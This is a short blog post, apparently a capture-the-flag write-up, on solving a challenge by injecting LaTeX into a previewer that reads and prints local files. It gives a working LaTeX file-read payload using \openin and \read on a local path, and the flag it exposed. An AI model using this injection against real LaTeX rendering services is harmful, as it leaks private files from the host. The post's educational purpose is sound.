Having very little experience with LaTeX, I googled around for a bit and stumbled on this paper: LaTeX Hacking
The paper describes how LaTeX previewers often make a system vulnerable because they are allowed to read and print local files as so (note the \hfill to make the line wrap):
\openin5=/home/awesker/cure
\def\readfile{%
\read5 to\curline
\ifeof5 \let\next=\relax
\else \curline˜\\
\let\next=\readfile
\fi
\next}%
\ifeof5 Couldn't read the file!%
\else \hfill \readfile \closein5
\fi
The font was fairly small, so I also included the following above the loop to make the flag readable:
\fontsize{20}{15}
\selectfont
Yay! The flag was embedded in the document now! Flag = gtttatgtagcttaccccctcaaagcaatacactgaaaatgtttcgacgggtttacatcaccccataaacaaacaggtttggtcctagcctttctattag
-- d1r3w0lf
No comments:
Post a Comment